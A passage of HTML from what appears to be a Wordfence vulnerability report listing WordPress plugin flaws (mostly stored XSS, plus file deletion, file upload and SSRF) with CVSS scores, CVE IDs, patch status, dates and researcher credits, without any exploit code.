<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/affiliate-wp" target="_blank" rel="noopener">AffiliateWP</a> <span class="wfvr-software-slug">[affiliate-wp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f419eceb-a3e7-4cf7-a37e-dcc57a26d7f5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6713c2dc-fc7f-4992-bde7-cfb94c383664" target="_blank" rel="noopener">AI Engine – The Chatbot, AI Framework &amp; MCP for WordPress &lt;= 3.6.8 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65545" target="_blank" rel="noopener noreferrer">							CVE-2026-65545						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ai-engine" target="_blank" rel="noopener">AI Engine – The Chatbot, AI Framework &amp; MCP for WordPress</a> <span class="wfvr-software-slug">[ai-engine]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6713c2dc-fc7f-4992-bde7-cfb94c383664" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a831d5ae-cf20-4f6b-bc3c-214295ec8e2d" target="_blank" rel="noopener">Anti Spam and list cleaner – AcyChecker &lt;= 1.8.1 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65448" target="_blank" rel="noopener noreferrer">							CVE-2026-65448						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acychecker" target="_blank" rel="noopener">Anti Spam and list cleaner – AcyChecker</a> <span class="wfvr-software-slug">[acychecker]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phuc-truong-huu" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/15c7bc3e71963fdd7c656346bcf8b159.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="15c7bc3e71963fdd7c656346bcf8b159"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phuc-truong-huu" target="_blank" rel="noopener">Trương Hữu Phúc (truonghuuphuc)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a831d5ae-cf20-4f6b-bc3c-214295ec8e2d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2dfd592b-cbe9-460a-8b9a-148058d1bd58" target="_blank" rel="noopener">BackWPup &lt;= 5.7.4 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65443" target="_blank" rel="noopener noreferrer">							CVE-2026-65443						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backwpup" target="_blank" rel="noopener">BackWPup – WordPress Backup &amp; Restore Plugin</a> <span class="wfvr-software-slug">[backwpup]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2dfd592b-cbe9-460a-8b9a-148058d1bd58" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e9274957-7584-4df6-bb2a-d745510f5033" target="_blank" rel="noopener">Better Messages &lt;= 2.15.19 &#8211; Authenticated (Administrator+) Arbitrary File Deletion via Path Traversal via &#8216;file&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16585" target="_blank" rel="noopener noreferrer">							CVE-2026-16585						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bp-better-messages" target="_blank" rel="noopener">Better Messages – Chat Rooms, Group Chat, Private Messages &amp; AI Chat Bots</a> <span class="wfvr-software-slug">[bp-better-messages]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e9274957-7584-4df6-bb2a-d745510f5033" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/73809551-b925-4789-b059-b9e60743f693" target="_blank" rel="noopener">Booking Calendar &lt;= 11.4.2 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59558" target="_blank" rel="noopener noreferrer">							CVE-2026-59558						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booking" target="_blank" rel="noopener">Booking Calendar</a> <span class="wfvr-software-slug">[booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/73809551-b925-4789-b059-b9e60743f693" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/01acb93b-89ae-4024-9f43-5fd14a7bd5f6" target="_blank" rel="noopener">Contest Gallery &lt;= 30.0.6 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65447" target="_blank" rel="noopener noreferrer">							CVE-2026-65447						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contest-gallery" target="_blank" rel="noopener">Contest Gallery – Upload &amp; Vote Photos, Media, Sell with PayPal &amp; Stripe</a> <span class="wfvr-software-slug">[contest-gallery]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jayant-kamble" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/cf19879c40314b138910d3ea903fbba3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cf19879c40314b138910d3ea903fbba3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jayant-kamble" target="_blank" rel="noopener">Jayant Kamble</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/01acb93b-89ae-4024-9f43-5fd14a7bd5f6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/07fda92e-a085-42c7-a16d-1eace1dee195" target="_blank" rel="noopener">Database for CF7 &lt;= 1.2.6 &#8211; Unauthenticated Stored Cross-Site Scripting via Array Form Field Values</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13425" target="_blank" rel="noopener noreferrer">							CVE-2026-13425						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/database-for-cf7" target="_blank" rel="noopener">Database for CF7</a> <span class="wfvr-software-slug">[database-for-cf7]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chawabhon-netisingha-jnx03" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/01d45ecf2afce2efacfa60186c282224.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01d45ecf2afce2efacfa60186c282224"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chawabhon-netisingha-jnx03" target="_blank" rel="noopener">Chawabhon Netisingha (JNX03)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/07fda92e-a085-42c7-a16d-1eace1dee195" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5b0c8edd-b392-4d23-bde3-0521eeedc5a0" target="_blank" rel="noopener">Easy Digital Downloads &lt;= 3.6.9 &#8211; Authenticated (Shop Manager+) Arbitrary File Upload via &#8216;edd-import-file&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12476" target="_blank" rel="noopener noreferrer">							CVE-2026-12476						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-digital-downloads" target="_blank" rel="noopener">Easy Digital Downloads – eCommerce Payments and Subscriptions made easy</a> <span class="wfvr-software-slug">[easy-digital-downloads]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tal-kantor" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/1c4391be2148aea7fca24075cd6c4c20.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1c4391be2148aea7fca24075cd6c4c20"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tal-kantor" target="_blank" rel="noopener">Tal Kantor</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5b0c8edd-b392-4d23-bde3-0521eeedc5a0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/52784505-a408-414f-a793-262d24f36546" target="_blank" rel="noopener">Easy PayPal &amp; Stripe Buy Now Button &lt;= 2.0.4 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65517" target="_blank" rel="noopener noreferrer">							CVE-2026-65517						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-ecommerce-paypal" target="_blank" rel="noopener">Easy PayPal &amp; Stripe Buy Now Button</a> <span class="wfvr-software-slug">[wp-ecommerce-paypal]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/52784505-a408-414f-a793-262d24f36546" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/635e19ba-da98-459c-ab91-ff969b0812fd" target="_blank" rel="noopener">Fluent Forms &lt;= 6.2.7 &#8211; Unauthenticated Stored Cross-Site Scripting via Name Field Nested `password` Member</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16655" target="_blank" rel="noopener noreferrer">							CVE-2026-16655						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluentform" target="_blank" rel="noopener">Fluent Forms – Customizable Contact Forms, Survey, Quiz, &amp; Conversational Form Builder</a> <span class="wfvr-software-slug">[fluentform]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/635e19ba-da98-459c-ab91-ff969b0812fd" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/82f5456e-f2cc-47f3-a957-f85d26834031" target="_blank" rel="noopener">FormCraft &lt;= 3.9.15 &#8211; Unauthenticated Server-Side Request Forgery</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65442" target="_blank" rel="noopener noreferrer">							CVE-2026-65442						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/formcraft" target="_blank" rel="noopener">FormCraft</a> <span class="wfvr-software-slug">[formcraft]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc" target="_blank" rel="noopener">luc</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/82f5456e-f2cc-47f3-a957-f85d26834031" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/aa1bac80-4927-4fee-942c-c23d51b18abd" target="_blank" rel="noopener">GetGenie &lt;= 4.4.3 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65440" target="_blank" rel="noopener noreferrer">							CVE-2026-65440						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/getgenie" target="_blank" rel="noopener">GetGenie – AI SEO Assistant &amp; Content Writer with Keyword Research, AEO &amp; GEO</a> <span class="wfvr-software-slug">[getgenie]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/aa1bac80-4927-4fee-942c-c23d51b18abd" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/82ff0450-5a76-453e-bb27-45c11fff7419" target="_blank" rel="noopener">GiveWP – Donation Plugin and Fundraising Platform &lt;= 4.16.5 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66690" target="_blank" rel="noopener noreferrer">							CVE-2026-66690						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/give" target="_blank" rel="noopener">GiveWP – Donation Plugin and Fundraising Platform</a> <span class="wfvr-software-slug">[give]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem-cyberkareem" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4f2a3b32ba525d9a6cd33a222b91f5ec.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4f2a3b32ba525d9a6cd33a222b91f5ec"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem-cyberkareem" target="_blank" rel="noopener">Abdullah Kareem &#8220;cyberkareem&#8221;</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/82ff0450-5a76-453e-bb27-45c11fff7419" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8a106ebb-f3ec-4995-9717-358b91d468b4" target="_blank" rel="noopener">GiveWP &lt;= 4.16.3 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65441" target="_blank" rel="noopener noreferrer">							CVE-2026-65441						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
